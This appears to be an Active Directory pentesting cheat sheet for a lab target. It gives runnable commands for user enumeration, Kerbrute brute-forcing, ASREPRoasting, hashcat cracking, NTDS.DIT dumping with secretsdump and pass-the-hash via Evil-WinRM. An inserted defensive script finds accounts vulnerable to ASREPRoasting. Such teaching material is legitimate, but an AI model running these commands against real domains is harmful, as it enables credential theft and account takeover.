While pentesting a Windows network, some tools are essential to have handy:
- Enum4Linux – Quick enumeration.
- Kerbrute – Enumerate domain users.
- Impacket – Parsing SMB and NetBIOS packets.
- ASREPRoasting attack – Finding users that do not require Kerberos pre-authentication.
- Hashcat – Cracking Kerberos hashes.
- secretsdump (Impacket) – Dumping NTDS.DIT hashes.
- Evil-WinRM – Logging in by passing an NTLM hash (no password needed).
- smbclient – Enumerating shares.
Quick enumeration of users, groups, shares, etc. with Enum4Linux:
/usr/share/enum4linux/enum4linux.pl -a 10.10.10.10
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.10.10
Kerbrute – Brute forces and enumerates valid Active Directory accounts through Kerberos Pre-Authentication.
There is also a short-handed repository for it that I recommend using:
git clone https://github.com/Sq00ky/attacktive-directory-tools.git
cd attacktive-directory-tools && chmod +x kerbrute
./kerbrute userenum --dc 10.10.10.10 -d domain.local user.lst
Installing Impacket – A toolkit able to parse packets of low- to high-level protocols, excellent for SMB and NetBIOS analysis:
sudo git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
sudo pip3 install -r /opt/impacket/requirements.txt
cd /opt/impacket/
sudo python3 ./setup.py install
ASREPRoasting attack using Impacket – Looks for users whose accounts are set to not require Kerberos pre-authentication:
python3 /opt/impacket/examples/GetNPUsers.py domain.local/admin -request -no-pass -dc-ip 10.10.10.10
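The accounts GetNPUsers.py finds are the ones with the "Do not require Kerberos preauthentication" flag (DONT_REQ_PREAUTH, 0x400000) set in userAccountControl. The following script is an added example, not part of the original cheat sheet: it parses a small LDIF-style export of user objects (the sample data below is constructed, and the export format is an assumption) and lists the accounts that are roastable, so a defender can find and fix them before an attacker does.

```python
"""Find AD accounts that have Kerberos pre-authentication disabled.

Added example (not part of the original cheat sheet): parses an LDIF-style
export of user objects and reports the accounts an ASREPRoasting run would
target, so they can be remediated. The LDIF below is constructed sample data.
"""

# userAccountControl bit flags (values defined by Active Directory)
ACCOUNTDISABLE = 0x0002
NORMAL_ACCOUNT = 0x0200
DONT_EXPIRE_PASSWORD = 0x10000
DONT_REQ_PREAUTH = 0x400000

# Constructed sample export; the attribute layout assumes an LDAP dump of
# sAMAccountName and userAccountControl for each user object.
SAMPLE_LDIF = """\
dn: CN=svc-admin,CN=Users,DC=domain,DC=local
sAMAccountName: svc-admin
userAccountControl: 4194816

dn: CN=backup,CN=Users,DC=domain,DC=local
sAMAccountName: backup
userAccountControl: 66048

dn: CN=oldsvc,CN=Users,DC=domain,DC=local
sAMAccountName: oldsvc
userAccountControl: 4194818
"""


def parse_ldif(text):
    """Split a minimal LDIF export into one dict of attributes per entry."""
    entries = []
    current = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            # Blank line terminates an entry.
            if current:
                entries.append(current)
                current = {}
            continue
        key, _, value = line.partition(":")
        current[key.strip()] = value.strip()
    if current:
        entries.append(current)
    return entries


def preauth_disabled_accounts(text, include_disabled=False):
    """Return sAMAccountNames whose userAccountControl has DONT_REQ_PREAUTH set.

    Disabled accounts are skipped by default: a disabled account cannot obtain
    an AS-REP, so it is not roastable, but it is still worth cleaning up.
    """
    found = []
    for entry in parse_ldif(text):
        try:
            uac = int(entry.get("userAccountControl", "0"))
        except ValueError:
            continue
        if not uac & DONT_REQ_PREAUTH:
            continue
        if uac & ACCOUNTDISABLE and not include_disabled:
            continue
        found.append(entry.get("sAMAccountName", entry.get("dn", "?")))
    return found


if __name__ == "__main__":
    for name in preauth_disabled_accounts(SAMPLE_LDIF):
        print(f"pre-auth disabled: {name}")
```

Clearing the flag on every account reported here removes the ASREPRoasting exposure; where a legacy application genuinely needs it, a long random password makes the AS-REP hash impractical to crack with a wordlist like the one used below.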
Cracking Kerberos hashes obtained from the ASREPRoasting attack:
hashcat --force -m 18200 -a 0 svc-admin.hash /usr/share/wordlists/rockyou.txt
Enumerating shares for a particular user – Knowing the password is required!
smbclient -U domain.local/admin -L //10.10.10.10
smbclient -U domain.local/admin //10.10.10.10/share
get file.txt
smbget -R smb://10.10.10.10/share
Dumping all NTDS.DIT hashes with Impacket:
python3 /opt/impacket/examples/secretsdump.py -dc-ip 10.10.10.10 domain.local/share:<password>@10.10.10.10
Authenticating by passing a dumped hash (no password required) using Evil-WinRM:
sudo gem install evil-winrm
evil-winrm -i 10.10.10.10 -u administrator -H 5f4dcc3b5aa765d61d8327deb882cf99